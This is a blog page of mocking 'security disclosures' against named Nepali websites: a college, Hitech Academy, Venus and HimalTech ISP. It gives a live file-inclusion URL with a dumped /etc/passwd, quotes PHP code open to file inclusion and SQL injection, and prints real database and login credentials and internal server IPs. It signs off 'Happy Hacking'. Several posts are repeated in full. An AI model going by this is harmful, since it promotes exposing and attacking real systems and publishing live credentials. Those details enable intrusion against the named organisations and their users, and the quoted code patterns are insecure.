I was checking the site of Little Angels College of Management when they were here in KU for the sports week. & in a while, I found it to be vulnerable to file inclusion vulnerability.
Vulnerable URL is:
http://lacm.edu.np/?lacm=[any_file_to_include]
/etc/passwd:
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash postfix:x:89:89::/var/spool/postfix:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin shiva:x:500:500::/home/shiva:/bin/bash ntp:x:38:38::/etc/ntp:/sbin/nologin admispconfig:x:501:501:Administrator ISPConfig:/home/admispconfig:/bin/bash
And I also got the sql Db.. what the hell they are keeping database backup in the website root folder itself.
See you guys.
Showing posts with label lfi. Show all posts
Showing posts with label lfi. Show all posts
Sunday, 25 April 2010
Saturday, 31 October 2009
Venus.com.np Security Disclosure
Venus.com.np Hackz:
Last 4 lines of .htaccess:
AuthType Basic
AuthName www.venus.com.np
AuthUserFile /home/venus/public_html/_vti_pvt/service.pwd
AuthGroupFile /home/venus/public_html/_vti_pvt/service.grp
Example of poor coding:
<?php
$inc = $_GET['page'] . '.php';
if ($inc == '.php') $inc = 'home.php';
//echo $inc;
?>
Nothing more to say. You know how vulnerable they are. Happy Hacking!!! :)
Last 4 lines of .htaccess:
AuthType Basic
AuthName www.venus.com.np
AuthUserFile /home/venus/public_html/_vti_pvt/service.pwd
AuthGroupFile /home/venus/public_html/_vti_pvt/service.grp
Example of poor coding:
<?php
$inc = $_GET['page'] . '.php';
if ($inc == '.php') $inc = 'home.php';
//echo $inc;
?>
Nothing more to say. You know how vulnerable they are. Happy Hacking!!! :)
Hitechacademy Security Disclosure
Hi there,
in this post, I am going to disclose the security issues of hitech academy which gives computer training to many students. Though it says its one of the best from Nepal, it knows nothing about security. So I thought to disclose them...
Learn some coding Hitech guys, the manager had told me in my interview that he has got some best paid programmers from Nepal and you(means I) can't compete with them, so sorry for this time.
From index.php:
if(isset($_GET['action']))
{
include("includes/".$_GET['action'].".php");
}
WTF? Don't you know how to validate variables. Sucks... Poor coding.
From DBConnection file:
<?php
$dbuser="hitechac_hitech";
$dbpassword="hitech";
$database="hitechac_hitech";
$host = "localhost";
$ado=new data($host,$dbuser,$dbpassword,$database);
?>
From one of the functions file:
function adminLogin($username, $password)
{
global $ado;
global $userGroups;
$sql = "SELECT u.* FROM users u, usergroups ug WHERE u.username = '$username' AND u.password = '$password'
AND u.userGroupId = ug.id AND ug.name = 'admin'";
$result = $ado->exec($sql);
if ($ado->count_row($result) > 0)
{
//login successful
$row = $ado->fetch_array($result);
$_SESSION['userId'] = $row['id'];
$_SESSION['userFullname'] = $row['fullname'];
$_SESSION['userUsername'] = $row['username'];
$_SESSION['userGroupId'] = $row['userGroupId'];
$gResult = $userGroups->getById($row['userGroupId']);
$gRow = $ado->fetch_array($gResult);
$_SESSION['userGroupPower'] = $gRow['power'];
$_SESSION['userGroupName'] = $gRow['name'];
return true;
}
//invalid login
return false;
}
WTF? Don't you know SQLi vuln is very bad.
Hitech email login PHP script snippet:
<?
session_start();
if (isset($_POST['Submit']))
{
if ($_POST['username'] == "hitechemail" && $_POST['password'] == "emailhitech")
{
$_SESSION['userId'] = "hitech";
header("Location: index.php");
exit();
}
}
?>
LOL... passes in normal form. Learn to use md5(), hitech.
To Hitech Academy, please make corrections in the following informations from your site(Do not hide the truth from your clients; just say how lame you are...):
HiTech Academy is an institution established with the aim of providing (non-)quality education and training in the field of Basic (and Advance; remove this) Computing, Computer Accounting, Hardware and Networking, (Add insecure) Computer Programming, Web Designing, Tele-communications, English Language and Personality Development and a host of other allied subjects. It also provides job placement services to its students as well as other job seekers.
in this post, I am going to disclose the security issues of hitech academy which gives computer training to many students. Though it says its one of the best from Nepal, it knows nothing about security. So I thought to disclose them...
Learn some coding Hitech guys, the manager had told me in my interview that he has got some best paid programmers from Nepal and you(means I) can't compete with them, so sorry for this time.
From index.php:
if(isset($_GET['action']))
{
include("includes/".$_GET['action'].".php");
}
WTF? Don't you know how to validate variables. Sucks... Poor coding.
From DBConnection file:
<?php
$dbuser="hitechac_hitech";
$dbpassword="hitech";
$database="hitechac_hitech";
$host = "localhost";
$ado=new data($host,$dbuser,$dbpassword,$database);
?>
From one of the functions file:
function adminLogin($username, $password)
{
global $ado;
global $userGroups;
$sql = "SELECT u.* FROM users u, usergroups ug WHERE u.username = '$username' AND u.password = '$password'
AND u.userGroupId = ug.id AND ug.name = 'admin'";
$result = $ado->exec($sql);
if ($ado->count_row($result) > 0)
{
//login successful
$row = $ado->fetch_array($result);
$_SESSION['userId'] = $row['id'];
$_SESSION['userFullname'] = $row['fullname'];
$_SESSION['userUsername'] = $row['username'];
$_SESSION['userGroupId'] = $row['userGroupId'];
$gResult = $userGroups->getById($row['userGroupId']);
$gRow = $ado->fetch_array($gResult);
$_SESSION['userGroupPower'] = $gRow['power'];
$_SESSION['userGroupName'] = $gRow['name'];
return true;
}
//invalid login
return false;
}
WTF? Don't you know SQLi vuln is very bad.
Hitech email login PHP script snippet:
<?
session_start();
if (isset($_POST['Submit']))
{
if ($_POST['username'] == "hitechemail" && $_POST['password'] == "emailhitech")
{
$_SESSION['userId'] = "hitech";
header("Location: index.php");
exit();
}
}
?>
LOL... passes in normal form. Learn to use md5(), hitech.
To Hitech Academy, please make corrections in the following informations from your site(Do not hide the truth from your clients; just say how lame you are...):
HiTech Academy is an institution established with the aim of providing (non-)quality education and training in the field of Basic (and Advance; remove this) Computing, Computer Accounting, Hardware and Networking, (Add insecure) Computer Programming, Web Designing, Tele-communications, English Language and Personality Development and a host of other allied subjects. It also provides job placement services to its students as well as other job seekers.
HimalTech [ISP] Security Disclosure
This is a minor one(at least I think). Himaltech is a ISP from Nepal (though I had never heard it). First think, don't host on Windows system; use free and open source Linux distro... They are cheaper, I think.
From index.php(exploitable snippet):
if(($p == "") && ($q != "")){
$filename = $q;
} elseif($p != ""){
$filename = $p."/content";
} else {
$filename = "home";
}
include($filename.$ext);
WTF? How are you making includes. Fucking noobish.
From one of the PHP scripts:
$query = "UPDATE newsFeed set date='". $_POST['dated'] ."' WHERE id='". $_POST['id'] ."'";
Oh hell. learn to validate the inputs. What would have happened if an evil user had submitted some malformed information.
Some configs from the functions.php:
<?php
$isp[lname] = "HimalTech Internet Services";
$isp[sname] = "HimalTech";
$isp[sup_tel] = "443-9541, 01-621-8615";
$isp[gen_tel] = "+977 (1) 44 39 541";
$isp[sup_email] = "support@himaltech.com";
$isp[gen_email] = "info@himaltech.com";
$radHost = "himaltech.com";
$radUser = "phpmgmt";
$radPass = "**EDITED**";
$radName = "radius";
$newsHost = localhost;
$newsUser = "himal";
$newsPass = "**EDITED**";
$newsName = "ht";
............
...........
?>
And some arrays:
$nas = array(
"69.88.8.94" => array("port" => 30, "name" => "Dhau"),
"10.0.0.3" => array("port" => 30, "name" => "vold_dhau"),
"202.161.146.197" => array("port" => 30, "name" => "old_dhau"),
"202.161.146.209" => array("port" => 30, "name" => "dhauold")
);
So that was the show on himaltech. Happy hacking!!! :)
From index.php(exploitable snippet):
if(($p == "") && ($q != "")){
$filename = $q;
} elseif($p != ""){
$filename = $p."/content";
} else {
$filename = "home";
}
include($filename.$ext);
WTF? How are you making includes. Fucking noobish.
From one of the PHP scripts:
$query = "UPDATE newsFeed set date='". $_POST['dated'] ."' WHERE id='". $_POST['id'] ."'";
Oh hell. learn to validate the inputs. What would have happened if an evil user had submitted some malformed information.
Some configs from the functions.php:
<?php
$isp[lname] = "HimalTech Internet Services";
$isp[sname] = "HimalTech";
$isp[sup_tel] = "443-9541, 01-621-8615";
$isp[gen_tel] = "+977 (1) 44 39 541";
$isp[sup_email] = "support@himaltech.com";
$isp[gen_email] = "info@himaltech.com";
$radHost = "himaltech.com";
$radUser = "phpmgmt";
$radPass = "**EDITED**";
$radName = "radius";
$newsHost = localhost;
$newsUser = "himal";
$newsPass = "**EDITED**";
$newsName = "ht";
............
...........
?>
And some arrays:
$nas = array(
"69.88.8.94" => array("port" => 30, "name" => "Dhau"),
"10.0.0.3" => array("port" => 30, "name" => "vold_dhau"),
"202.161.146.197" => array("port" => 30, "name" => "old_dhau"),
"202.161.146.209" => array("port" => 30, "name" => "dhauold")
);
So that was the show on himaltech. Happy hacking!!! :)
Subscribe to:
Posts (Atom)